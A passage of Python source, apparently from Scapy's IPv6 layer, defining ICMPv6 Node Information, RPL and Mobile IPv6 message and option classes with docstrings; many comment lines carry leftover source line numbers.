2365# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
2366# if not overridden
2367# - Name in the other cases: code is set to 0, if not overridden by user
2368#
# Internal storage is not only the value, but a pair providing
# the type and the value (0 is IPv6@, 1 is Name or string, 2 is IPv4@)
2371#
2372# Note : I merged getfield() and m2i(). m2i() should not be called
2373# directly anyway. Same remark for addfield() and i2m()
2374#
2375# -- arno
2376
2377# "The type of information present in the Data field of a query is
2378# declared by the ICMP Code, whereas the type of information in a
2379# Reply is determined by the Qtype"
2380
def names2dnsrepr(x):
    """
    Encode one DNS name, or a list of DNS names, in DNS wire format.

    The input is either a single name (bytes) or an iterable of names
    (bytes). A single bytes value that already ends with a null byte is
    assumed to be DNS encoded and is returned as is. Every label is
    prefixed with its length and every name is terminated by a null
    byte; names made of a single label get a second null byte.
    The result is a bytes string. Compression is not implemented.
    """
    if isinstance(x, bytes):
        # Crude heuristic: a trailing null byte means "already encoded"
        if x.endswith(b'\x00'):
            return x
        x = [x]

    encoded = []
    for name in x:
        labels = name.split(b'.')
        # A name without any dot is terminated by two null bytes
        terminator = b"\x00\x00" if len(labels) == 1 else b"\x00"
        wire = b"".join(chb(len(label)) + label for label in labels)
        encoded.append(wire + terminator)
    return b"".join(encoded)
2403
2404
def dnsrepr2names(x):
    """
    Decode a DNS encoded bytes string into the list of names it holds.

    Labels are joined with dots; a name is emitted each time a null
    length byte is met. A second null byte directly following the end of
    a name (single-component encoding) is skipped. Labels that are not
    followed by a terminating null byte are not returned.
    An Exception is raised when a length byte has one of its two high
    bits set, as compression is not supported. Result is a list of bytes.
    """
    names = []
    labels = []
    while x:
        size = orb(x[0])
        x = x[1:]
        if size:
            if size & 0xc0:  # XXX TODO : work on that -- arno
                raise Exception("DNS message can't be compressed at this point!")
            labels.append(x[:size])
            x = x[size:]
        else:
            # End of the current name
            names.append(b".".join(labels))
            labels = []
            if x and orb(x[0]) == 0:  # single component
                x = x[1:]
    return names
2431
2432
class NIQueryDataField(StrField):
    """Data field of Node Information queries.

    The internal value is a (type, value) pair where type is 0 for an IPv6
    address (str), 1 for a DNS encoded name (bytes) and 2 for an IPv4
    address (str). The type is guessed from the value provided by the
    user; getfield() and addfield() directly deal with the internal value.
    """

    def __init__(self, name, default):
        StrField.__init__(self, name, default)

    def i2h(self, pkt, x):
        """Return the address, or the first decoded name for DNS data."""
        if x is None:
            return x
        t, val = x
        if t == 1:
            val = dnsrepr2names(val)[0]
        return val

    def h2i(self, pkt, x):
        """Convert a user provided value into the internal (type, value) pair.

        :param x: an internal (type, value) tuple, which is returned as is,
            or bytes/str holding an IPv6 address, an IPv4 address or a DNS
            name, or None (handled as an empty name)
        :return: the (type, value) tuple
        """
        # Already in internal form. isinstance() is required here: the
        # identity test "x is tuple" is never true for a tuple instance.
        if isinstance(x, tuple) and x and isinstance(x[0], int):
            return x

        if x is None:
            return (1, names2dnsrepr(b""))
        if isinstance(x, str):
            x = x.encode("utf8")

        # The guesses below are deliberately best-effort: any failure
        # (not decodable, not an address, unexpected type) simply means
        # that the next interpretation must be tried.
        # Try IPv6
        try:
            addr = x.decode()
            inet_pton(socket.AF_INET6, addr)
            return (0, addr)
        except Exception:
            pass
        # Try IPv4
        try:
            addr = x.decode()
            inet_pton(socket.AF_INET, addr)
            return (2, addr)
        except Exception:
            pass
        # Try DNS
        return (1, names2dnsrepr(x))

    def i2repr(self, pkt, x):
        """Return a printable form of the internal value."""
        t, val = x
        if t == 1:  # DNS Name
            # we don't use dnsrepr2names() to deal with
            # possible weird data extracted info
            res = []
            while val:
                tmp_len = orb(val[0])
                val = val[1:]
                if tmp_len == 0:
                    break
                res.append(plain_str(val[:tmp_len]) + ".")
                val = val[tmp_len:]
            tmp = "".join(res)
            if tmp and tmp[-1] == '.':
                tmp = tmp[:-1]
            return tmp
        return repr(val)

    def getfield(self, pkt, s):
        """Dissect the data according to the packet qtype and code."""
        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")
        else:
            code = getattr(pkt, "code")
            if code == 0:   # IPv6 Addr
                return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
            elif code == 2:  # IPv4 Addr
                return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
            else:           # Name or Unknown
                return b"", (1, s)

    def addfield(self, pkt, s, val):
        """Append the wire form of the internal value val to s."""
        # No value at all is built as an empty name
        if ((isinstance(val, tuple) and val[1] is None) or
                val is None):
            val = (1, b"")
        t = val[0]
        if t == 1:
            return s + val[1]
        elif t == 0:
            return s + inet_pton(socket.AF_INET6, val[1])
        else:
            return s + inet_pton(socket.AF_INET, val[1])
2510
2511
class NIQueryCodeField(ByteEnumField):
    """Code field of NI queries, guessed from the "data" field when unset."""

    def i2m(self, pkt, x):
        """Return x, or the code matching the type of the packet data.

        The data type (0: IPv6 address, 1: name, 2: IPv4 address) is used
        as the code; 1 is returned when there is no data or when its type
        is not one of those.
        """
        if x is not None:
            return x
        d = pkt.getfieldval("data")
        if d is not None:
            for known in (0, 1, 2):
                if d[0] == known:
                    return known
        return 1
2527
2528
# Display names of the NI query "code" values (see NIQueryCodeField)
_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
2530
2531# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
2532# 8: "Link-local addresses", 16: "Site-local addresses",
2533# 32: "Global addresses" }
2534
2535# "This NI type has no defined flags and never has a Data Field". Used
2536# to know if the destination is up and implements NI protocol.
2537
2538
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
    """ICMPv6 Node Information Query (type 139) with qtype 0 (NOOP).

    Base class of the other NI query classes, which only override the
    default qtype (and flags).
    """
    name = "ICMPv6 Node Information Query - NOOP Query"
    fields_desc = [ByteEnumField("type", 139, icmp6types),
                   # Left to None, the code is derived from the data type
                   NIQueryCodeField("code", None, _niquery_code),
                   XShortField("cksum", None),
                   ShortEnumField("qtype", 0, icmp6_niqtypes),
                   # 10 unused bits and 6 flag bits share two bytes
                   BitField("unused", 0, 10),
                   FlagsField("flags", 0, 6, "TACLSG"),
                   NonceField("nonce", None),
                   NIQueryDataField("data", None)]
2549
2550
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
    """NI query with qtype 2 ("Node Name" in icmp6_niqtypes)."""
    name = "ICMPv6 Node Information Query - IPv6 Name Query"
    qtype = 2
2554
2555# We ask for the IPv6 address of the peer
2556
2557
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
    """NI query with qtype 3 ("IPv6 Address"); flags default to 0x3E."""
    name = "ICMPv6 Node Information Query - IPv6 Address Query"
    qtype = 3
    flags = 0x3E
2562
2563
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
    """NI query with qtype 4 ("IPv4 Address" in icmp6_niqtypes)."""
    name = "ICMPv6 Node Information Query - IPv4 Address Query"
    qtype = 4
2567
2568
# Display names of the NI reply "code" values. Code 2 is the one used for
# replies to an unknown Qtype (see ICMPv6NIReplyUnknown and
# _niquery_guesser), hence it is the key carrying that label.
_nireply_code = {0: "Successful Reply",
                 1: "Response Refusal",
                 2: "Unknown query type"}
2572
# Descriptions of NI reply flag values, keyed by bit value
_nireply_flags = {1: "Reply set incomplete",
                  2: "All unicast addresses",
                  4: "IPv4 addresses",
                  8: "Link-local addresses",
                  16: "Site-local addresses",
                  32: "Global addresses"}
2579
2580# Internal repr is one of those :
2581# (0, "some string") : unknown qtype value are mapped to that one
2582# (3, [ (ttl, ip6), ... ])
2583# (4, [ (ttl, ip4), ... ])
2584# (2, [ttl, dns_names]) : dns_names is one string that contains
2585# all the DNS names. Internally it is kept ready to be sent
2586# (undissected). i2repr() decode it for user. This is to
2587# make build after dissection bijective.
2588#
2589# I also merged getfield() and m2i(), and addfield() and i2m().
2590
2591
class NIReplyDataField(StrField):
    """Data field of Node Information replies.

    The internal value is a (qtype, value) pair:
      - (2, [ttl, dnsnames]) where dnsnames is kept DNS encoded (bytes),
      - (3, [(ttl, ip6), ...]) and (4, [(ttl, ip4), ...]),
      - (0, data) for anything else.
    getfield() and addfield() directly deal with this internal value.
    """

    def i2h(self, pkt, x):
        """Return the value part; DNS data becomes [ttl, name1, name2, ...]."""
        if x is None:
            return x
        t, val = x
        if t == 2:
            ttl, dnsnames = val
            val = [ttl] + dnsrepr2names(dnsnames)
        return val

    def h2i(self, pkt, x):
        """Convert a user provided value into the internal (qtype, value) pair.

        x is either a (qtype, value) tuple or a bare value, in which case
        the qtype of pkt is used (0 when pkt is None).
        """
        qtype = 0  # We will decode it as string if not
        # overridden through 'qtype' in pkt

        # No user hint, let's use 'qtype' value for that purpose
        if not isinstance(x, tuple):
            if pkt is not None:
                qtype = pkt.qtype
        else:
            qtype = x[0]
            x = x[1]

        # From that point on, x is the value (second element of the tuple)

        if qtype == 2:  # DNS name
            if isinstance(x, (str, bytes)):  # listify the string
                x = [x]
            if isinstance(x, list):
                # Names are handled as bytes
                x = [val.encode() if isinstance(val, str) else val for val in x]  # noqa: E501
            # An optional leading integer is the TTL, 0 is used otherwise
            if x and isinstance(x[0], int):
                ttl = x[0]
                names = x[1:]
            else:
                ttl = 0
                names = x
            return (2, [ttl, names2dnsrepr(names)])

        elif qtype in [3, 4]:  # IPv4 or IPv6 addr
            if not isinstance(x, list):
                x = [x]  # User directly provided an IP, instead of list

            def fixvalue(x):
                # List elements are not tuples, user probably
                # omitted ttl value : we will use 0 instead
                if not isinstance(x, tuple):
                    x = (0, x)
                # Decode bytes
                if isinstance(x[1], bytes):
                    x = (x[0], x[1].decode())
                return x

            return (qtype, [fixvalue(d) for d in x])

        return (qtype, x)

    def addfield(self, pkt, s, val):
        """Append the wire form of the internal value val to s."""
        t, tmp = val
        if tmp is None:
            tmp = b""
        if t == 2:
            # 32-bit TTL followed by the already encoded names
            ttl, dnsstr = tmp
            return s + struct.pack("!I", ttl) + dnsstr
        elif t == 3:
            # Sequence of 32-bit TTL + 16-byte IPv6 address
            return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp))  # noqa: E501
        elif t == 4:
            # Sequence of 32-bit TTL + 4-byte IPv4 address
            return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp))  # noqa: E501
        else:
            return s + tmp

    def getfield(self, pkt, s):
        """Dissect the data according to the packet code and qtype."""
        # Data is only dissected for replies whose code is 0
        code = getattr(pkt, "code")
        if code != 0:
            return s, (0, b"")

        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")

        elif qtype == 2:
            # Not enough bytes to hold the TTL: leave the data untouched
            if len(s) < 4:
                return s, (0, b"")
            ttl = struct.unpack("!I", s[:4])[0]
            return b"", (2, [ttl, s[4:]])

        elif qtype == 3:  # IPv6 addresses with TTLs
            # XXX TODO : get the real length
            res = []
            while len(s) >= 20:  # 4 + 16
                ttl = struct.unpack("!I", s[:4])[0]
                ip = inet_ntop(socket.AF_INET6, s[4:20])
                res.append((ttl, ip))
                s = s[20:]
            return s, (3, res)

        elif qtype == 4:  # IPv4 addresses with TTLs
            # XXX TODO : get the real length
            res = []
            while len(s) >= 8:  # 4 + 4
                ttl = struct.unpack("!I", s[:4])[0]
                ip = inet_ntop(socket.AF_INET, s[4:8])
                res.append((ttl, ip))
                s = s[8:]
            return s, (4, res)
        else:
            # XXX TODO : implement me and deal with real length
            return b"", (0, s)

    def i2repr(self, pkt, x):
        """Return a printable form of the internal value."""
        if x is None:
            return "[]"

        if isinstance(x, tuple) and len(x) == 2:
            t, val = x
            if t == 2:  # DNS names
                # tmp_len first holds the encoded names, then the decoded list
                ttl, tmp_len = val
                tmp_len = dnsrepr2names(tmp_len)
                names_list = (plain_str(name) for name in tmp_len)
                return "ttl:%d %s" % (ttl, ",".join(names_list))
            elif t == 3 or t == 4:
                return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val)))  # noqa: E501
            return repr(val)
        return repr(x)  # XXX should not happen
2715
2716# By default, sent responses have code set to 0 (successful)
2717
2718
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
    """ICMPv6 Node Information Reply (type 140) with qtype 0 (NOOP).

    Base class of the other NI reply classes, which only override the
    default qtype or code. Matching with queries relies on the nonce.
    """
    name = "ICMPv6 Node Information Reply - NOOP Reply"
    fields_desc = [ByteEnumField("type", 140, icmp6types),
                   ByteEnumField("code", 0, _nireply_code),
                   XShortField("cksum", None),
                   ShortEnumField("qtype", 0, icmp6_niqtypes),
                   # 10 unused bits and 6 flag bits share two bytes
                   BitField("unused", 0, 10),
                   FlagsField("flags", 0, 6, "TACLSG"),
                   NonceField("nonce", None),
                   NIReplyDataField("data", None)]
2729
2730
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
    """NI reply with qtype 2 ("Node Name" in icmp6_niqtypes)."""
    name = "ICMPv6 Node Information Reply - Node Names"
    qtype = 2
2734
2735
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
    """NI reply with qtype 3 ("IPv6 Address" in icmp6_niqtypes)."""
    name = "ICMPv6 Node Information Reply - IPv6 addresses"
    qtype = 3
2739
2740
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
    """NI reply with qtype 4 ("IPv4 Address" in icmp6_niqtypes)."""
    name = "ICMPv6 Node Information Reply - IPv4 addresses"
    qtype = 4
2744
2745
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
    """NI reply whose code defaults to 1 (refusal)."""
    name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
    code = 1
2749
2750
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
    """NI reply whose code defaults to 2 (qtype unknown to the responder)."""
    name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
    code = 2
2754
2755
def _niquery_guesser(p):
    """Select the class used to dissect a Node Information message.

    :param p: the raw ICMPv6 message, starting at its type byte
    :return: the NI query class (type 139) or NI reply class (type 140)
        matching the qtype/code found in p, conf.raw_layer otherwise
    """
    fallback = conf.raw_layer
    msg_type = orb(p[0])

    if msg_type == 139:  # Node Info Query specific stuff
        if len(p) <= 6:
            return fallback
        qtype, = struct.unpack("!H", p[4:6])
        queries = {0: ICMPv6NIQueryNOOP,
                   2: ICMPv6NIQueryName,
                   3: ICMPv6NIQueryIPv6,
                   4: ICMPv6NIQueryIPv4}
        return queries.get(qtype, conf.raw_layer)

    if msg_type == 140:  # Node Info Reply specific stuff
        code = orb(p[1])
        if code == 1:
            return ICMPv6NIReplyRefuse
        if code == 2:
            return ICMPv6NIReplyUnknown
        if code == 0 and len(p) > 6:
            # Successful reply: the class depends on the qtype
            qtype, = struct.unpack("!H", p[4:6])
            replies = {2: ICMPv6NIReplyName,
                       3: ICMPv6NIReplyIPv6,
                       4: ICMPv6NIReplyIPv4}
            return replies.get(qtype, ICMPv6NIReplyNOOP)

    return fallback
2779
2780
2781#############################################################################
2782#############################################################################
2783# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) #
2784#############################################################################
2785#############################################################################
2786
2787# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes
# Display names of the RPL control message codes handled here; the
# commented out entries are not enabled
rplcodes = {0: "DIS",
            1: "DIO",
            2: "DAO",
            3: "DAO-ACK",
            # 4: "P2P-DRO",
            # 5: "P2P-DRO-ACK",
            # 6: "Measurement",
            7: "DCO",
            8: "DCO-ACK"}
2797
2798
class ICMPv6RPL(_ICMPv6):   # RFC 6550
    """ICMPv6 RPL control message (type 155); code names come from rplcodes."""
    name = 'RPL'
    fields_desc = [ByteEnumField("type", 155, icmp6types),
                   ByteEnumField("code", 0, rplcodes),
                   XShortField("cksum", None)]
    # IPv6 field values overloaded when this layer sits on top of IPv6
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}}
2805
2806
2807#############################################################################
2808#############################################################################
2809# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) #
2810#############################################################################
2811#############################################################################
2812
2813# Mobile IPv6 ICMPv6 related classes
2814
class ICMPv6HAADRequest(_ICMPv6):
    """ICMPv6 Home Agent Address Discovery Request message (type 144)."""
    name = 'ICMPv6 Home Agent Address Discovery Request'
    fields_desc = [ByteEnumField("type", 144, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   # 1-bit flag followed by 15 reserved bits
                   BitEnumField("R", 1, 1, {1: 'MR'}),
                   XBitField("res", 0, 15)]

    def hashret(self):
        """Return the packed identifier followed by the payload hashret."""
        # "id" defaults to None, which struct cannot pack: handle it as 0.
        # NOTE(review): 0 is presumably what the field emits on the wire
        # for None - confirm against XShortField.
        return struct.pack("!H", self.id or 0) + self.payload.hashret()
2826
2827
class ICMPv6HAADReply(_ICMPv6):
    """ICMPv6 Home Agent Address Discovery Reply message (type 145).

    Answers an ICMPv6HAADRequest carrying the same identifier.
    """
    name = 'ICMPv6 Home Agent Address Discovery Reply'
    fields_desc = [ByteEnumField("type", 145, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   # 1-bit flag followed by 15 reserved bits
                   BitEnumField("R", 1, 1, {1: 'MR'}),
                   XBitField("res", 0, 15),
                   IP6ListField('addresses', None)]

    def hashret(self):
        """Return the packed identifier followed by the payload hashret."""
        # "id" defaults to None, which struct cannot pack: handle it as 0.
        # NOTE(review): 0 is presumably what the field emits on the wire
        # for None - confirm against XShortField.
        return struct.pack("!H", self.id or 0) + self.payload.hashret()

    def answers(self, other):
        """Tell whether this reply matches the request ``other``."""
        if not isinstance(other, ICMPv6HAADRequest):
            return 0
        # An unset identifier (None) is compared as 0, like in hashret()
        return (self.id or 0) == (other.id or 0)
2845
2846
class ICMPv6MPSol(_ICMPv6):
    """ICMPv6 Mobile Prefix Solicitation message (type 146)."""
    name = 'ICMPv6 Mobile Prefix Solicitation'
    fields_desc = [ByteEnumField("type", 146, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   XShortField("res", 0)]

    def hashret(self):
        """Return the packed identifier.

        This is the value also returned by ICMPv6MPAdv.hashret(), which is
        needed for an advertisement to be paired with its solicitation.
        """
        # "id" defaults to None, which struct cannot pack: handle it as 0
        return struct.pack("!H", self.id or 0)

    # Historical (misspelled) name of the method, kept for compatibility
    _hashret = hashret
2857
2858
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    """ICMPv6 Mobile Prefix Advertisement message (type 147).

    Considered an answer to any ICMPv6MPSol.
    """
    name = 'ICMPv6 Mobile Prefix Advertisement'
    fields_desc = [ByteEnumField("type", 147, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   # 2 flag bits followed by 14 reserved bits
                   BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
                   XBitField("res", 0, 14)]

    def hashret(self):
        """Return the packed identifier."""
        # "id" defaults to None, which struct cannot pack: handle it as 0
        return struct.pack("!H", self.id or 0)

    def answers(self, other):
        """Return True when other is a Mobile Prefix Solicitation."""
        return isinstance(other, ICMPv6MPSol)
2873
2874# Mobile IPv6 Options classes
2875
2876
# Display names of the Mobile IPv6 option types, used by the "otype" field
# of the MIP6Opt* classes
_mobopttypes = {2: "Binding Refresh Advice",
                3: "Alternate Care-of Address",
                4: "Nonce Indices",
                5: "Binding Authorization Data",
                6: "Mobile Network Prefix (RFC3963)",
                7: "Link-Layer Address (RFC4068)",
                8: "Mobile Node Identifier (RFC4283)",
                9: "Mobility Message Authentication (RFC4285)",
                10: "Replay Protection (RFC4285)",
                11: "CGA Parameters Request (RFC4866)",
                12: "CGA Parameters (RFC4866)",
                13: "Signature (RFC4866)",
                14: "Home Keygen Token (RFC4866)",
                15: "Care-of Test Init (RFC4866)",
                16: "Care-of Test (RFC4866)"}
2892
2893
class _MIP6OptAlign(Packet):
    """ Base class of Mobile IPv6 options, dealing with their alignment.

    An option must start at an offset of the form x*n+y. Subclasses only
    provide x and y as class attributes (both set to 0 when there is no
    alignment requirement); alignment_delta() then gives the amount of
    padding (Pad1 or PadN option) needed in front of the option."""

    __slots__ = ["x", "y"]

    def alignment_delta(self, curpos):
        """Return the number of padding bytes needed at offset curpos."""
        x, y = self.x, self.y
        if (x, y) == (0, 0):
            # No alignment requirement
            return 0
        # Index of the first x*n+y slot located at or after curpos
        slot = (curpos - y + x - 1) // x
        return x * slot + y - curpos

    def extract_padding(self, p):
        """Keep no payload: everything after the option is padding."""
        return b"", p
2913
2914
class MIP6OptBRAdvice(_MIP6OptAlign):
    """Mobile IPv6 Binding Refresh Advice option (option type 2)."""
    name = 'Mobile IPv6 Option - Binding Refresh Advice'
    fields_desc = [ByteEnumField('otype', 2, _mobopttypes),
                   ByteField('olen', 2),
                   ShortField('rinter', 0)]
    x = 2
    y = 0  # alignment requirement: 2n
2922
2923
class MIP6OptAltCoA(_MIP6OptAlign):
    """Mobile IPv6 Alternate Care-of Address option (option type 3)."""
    name = 'MIPv6 Option - Alternate Care-of Address'
    fields_desc = [ByteEnumField('otype', 3, _mobopttypes),
                   ByteField('olen', 16),
                   IP6Field("acoa", "::")]
    x = 8
    y = 6  # alignment requirement: 8n+6
2931
2932
class MIP6OptNonceIndices(_MIP6OptAlign):
    """Mobile IPv6 Nonce Indices option (option type 4).

    The option data is made of two 16-bit indices, hence the default
    option length of 4 bytes.
    """
    name = 'MIPv6 Option - Nonce Indices'
    fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
                   # Length of the data following olen: hni (2) + coni (2)
                   ByteField('olen', 4),
                   ShortField('hni', 0),
                   ShortField('coni', 0)]
    x = 2
    y = 0  # alignment requirement: 2n
2941
2942
class MIP6OptBindingAuthData(_MIP6OptAlign):
    """Mobile IPv6 Binding Authorization Data option (option type 5).

    The authenticator is a 96-bit value, hence the default option length
    of 12 bytes.
    """
    name = 'MIPv6 Option - Binding Authorization Data'
    fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
                   # Length of the authenticator: 96 bits, i.e. 12 bytes
                   ByteField('olen', 12),
                   BitField('authenticator', 0, 96)]
    x = 8
    y = 2  # alignment requirement: 8n+2
2950
2951
class MIP6OptMobNetPrefix(_MIP6OptAlign):  # NEMO - RFC 3963
    """NEMO Mobile Network Prefix option (option type 6)."""
    name = 'NEMO Option - Mobile Network Prefix'
    fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
                   # 18 = reserved (1) + plen (1) + prefix (16)
                   ByteField("olen", 18),
                   ByteField("reserved", 0),
                   ByteField("plen", 64),
                   IP6Field("prefix", "::")]
    x = 8
    y = 4  # alignment requirement: 8n+4
2961
2962
class MIP6OptLLAddr(_MIP6OptAlign):  # Sect 6.4.4 of RFC 4068
    """Mobile IPv6 Link-Layer Address (MH-LLA) option (option type 7).

    "ocode" is displayed with the labels of _rfc4068_lla_optcode.
    """
    name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
    fields_desc = [ByteEnumField("otype", 7, _mobopttypes),
                   ByteField("olen", 7),
                   ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
                   ByteField("pad", 0),
                   MACField("lla", ETHER_ANY)]  # Only support ethernet
    x = 0
    y = 0  # alignment requirement: none
2972
2973
class MIP6OptMNID(_MIP6OptAlign):  # RFC 4283
    """Mobile IPv6 Mobile Node Identifier option (option type 8).

    When "olen" is None it is computed as len(id) + 1 (the extra byte is
    the subtype); at dissection "id" spans olen - 1 bytes.
    """
    name = "MIPv6 Option - Mobile Node Identifier"
    fields_desc = [ByteEnumField("otype", 8, _mobopttypes),
                   FieldLenField("olen", None, length_of="id", fmt="B",
                                 adjust=lambda pkt, x: x + 1),
                   ByteEnumField("subtype", 1, {1: "NAI"}),
                   StrLenField("id", "",
                               length_from=lambda pkt: pkt.olen - 1)]
    x = 0
    y = 0  # alignment requirement: none
2984
2985# We only support decoding and basic build. Automatic HMAC computation is
2986# too much work for our current needs. It is left to the user (I mean ...
2987# you). --arno
2988
2989
class MIP6OptMsgAuth(_MIP6OptAlign):  # RFC 4285 (Sect. 5)
    """Mobility option (type 9) carrying message authentication data.

    ``olen`` covers the subtype (1 octet), the SPI (4 octets) and the
    authentication data. The authentication data is not computed
    automatically: it has to be provided by the caller.
    """
    name = "MIPv6 Option - Mobility Message Authentication"
    fields_desc = [
        ByteEnumField("otype", 9, _mobopttypes),
        # Built as len(authdata) + 5 (subtype + mspi)
        FieldLenField("olen", None, length_of="authdata", fmt="B",
                      adjust=lambda pkt, x: x + 5),
        ByteEnumField("subtype", 1,
                      {1: "MN-HA authentication mobility option",
                       2: "MN-AAA authentication mobility option"}),
        IntField("mspi", None),
        # Dissected as olen - 5 octets
        StrLenField("authdata", "A" * 12,
                    length_from=lambda pkt: pkt.olen - 5),
    ]
    # Alignment requirement: 4n+1
    x = 4
    y = 1
3002
3003# Extracted from RFC 1305 (NTP) :
3004# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
3005# in seconds relative to 0h on 1 January 1900. The integer part is in the
3006# first 32 bits and the fraction part in the last 32 bits.
3007
3008
class NTPTimestampField(LongField):
    """64-bit NTP timestamp (32-bit seconds since 1900, 32-bit fraction)."""

    def i2repr(self, pkt, x):
        """Return a human readable UTC date for the NTP timestamp ``x``.

        :param pkt: the packet holding the field (unused)
        :param x: the 64-bit fixed-point NTP timestamp
        :returns: "<date> (<raw value>)", or a generic message for values
            older than 50 years after the NTP epoch or that the platform
            cannot convert.
        """
        too_old = "Some date a few decades ago (%d)" % x
        if x < ((50 * 31536000) << 32):
            return too_old

        # Seconds between the NTP epoch (1900-01-01 00:00:00 UTC) and the
        # Unix epoch (1970-01-01 00:00:00 UTC): 70 years including 17 leap
        # days, i.e. (70 * 365 + 17) * 86400.
        ntp_to_unix = 2208988800

        seconds = int(x >> 32)
        fraction = float(x & 0xffffffff) * 2.0**-32
        unix_time = seconds + fraction - ntp_to_unix
        try:
            t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(unix_time))
        except (OSError, OverflowError, ValueError):
            # Some platforms refuse timestamps before the Unix epoch
            return too_old

        return "%s (%d)" % (t, x)
3023
3024
class MIP6OptReplayProtection(_MIP6OptAlign):  # RFC 4285 (Sect. 6)
    """Mobility option (type 10) carrying a replay protection timestamp."""
    name = "MIPv6 option - Replay Protection"
    fields_desc = [
        ByteEnumField("otype", 10, _mobopttypes),
        ByteField("olen", 8),  # size of the 64-bit timestamp
        NTPTimestampField("timestamp", 0),
    ]
    # Alignment requirement: 8n+2
    x = 8
    y = 2
3032
3033
class MIP6OptCGAParamsReq(_MIP6OptAlign):  # RFC 4866 (Sect. 5.6)
    """Mobility option (type 11) requesting CGA parameters; no payload."""
    name = "MIPv6 option - CGA Parameters Request"
    fields_desc = [
        ByteEnumField("otype", 11, _mobopttypes),
        ByteField("olen", 0),
    ]
    # Alignment requirement: none
    x = 0
    y = 0
3040
3041# XXX TODO: deal with CGA param fragmentation and build of defragmented
3042# XXX version. Passing of a big CGAParam structure should be
3043# XXX simplified. Make it hold packets, by the way --arno
3044
3045
class MIP6OptCGAParams(_MIP6OptAlign):  # RFC 4866 (Sect. 5.1)
    """Mobility option (type 12) carrying raw CGA parameters.

    The parameters are handled as an opaque string of ``olen`` octets.
    """
    name = "MIPv6 option - CGA Parameters"
    fields_desc = [
        ByteEnumField("otype", 12, _mobopttypes),
        FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
        StrLenField("cgaparams", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # Alignment requirement: none
    x = 0
    y = 0
3054
3055
class MIP6OptSignature(_MIP6OptAlign):  # RFC 4866 (Sect. 5.2)
    """Mobility option (type 13) carrying a signature of ``olen`` octets."""
    name = "MIPv6 option - Signature"
    fields_desc = [
        ByteEnumField("otype", 13, _mobopttypes),
        FieldLenField("olen", None, length_of="sig", fmt="B"),
        StrLenField("sig", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # Alignment requirement: none
    x = 0
    y = 0
3064
3065
class MIP6OptHomeKeygenToken(_MIP6OptAlign):  # RFC 4866 (Sect. 5.3)
    """Mobility option (type 14) carrying a home keygen token."""
    name = "MIPv6 option - Home Keygen Token"
    fields_desc = [
        ByteEnumField("otype", 14, _mobopttypes),
        FieldLenField("olen", None, length_of="hkt", fmt="B"),
        StrLenField("hkt", "",
                    length_from=lambda pkt: pkt.olen),
    ]
    # Alignment requirement: none
    x = 0
    y = 0
3074
3075
class MIP6OptCareOfTestInit(_MIP6OptAlign):  # RFC 4866 (Sect. 5.4)
    """Mobility option (type 15), Care-of Test Init; no payload."""
    name = "MIPv6 option - Care-of Test Init"
    fields_desc = [
        ByteEnumField("otype", 15, _mobopttypes),
        ByteField("olen", 0),
    ]
    # Alignment requirement: none
    x = 0
    y = 0
3082
3083
class MIP6OptCareOfTest(_MIP6OptAlign):  # RFC 4866 (Sect. 5.5)
    """Mobility option (type 16) carrying a care-of keygen token.

    The token defaults to 8 null octets.
    """
    name = "MIPv6 option - Care-of Test"
    fields_desc = [
        ByteEnumField("otype", 16, _mobopttypes),
        FieldLenField("olen", None, length_of="cokt", fmt="B"),
        StrLenField("cokt", b'\x00' * 8,
                    length_from=lambda pkt: pkt.olen),
    ]
    # Alignment requirement: none
    x = 0
    y = 0
3092
3093
class MIP6OptUnknown(_MIP6OptAlign):
    """Fallback mobility option holding its payload as an opaque string.

    It is also the dispatching entry point: when raw data is available, the
    class registered in ``moboptcls`` for the option type is selected.
    """
    name = 'Scapy6 - Unknown Mobility Option'
    fields_desc = [
        ByteEnumField("otype", 6, _mobopttypes),
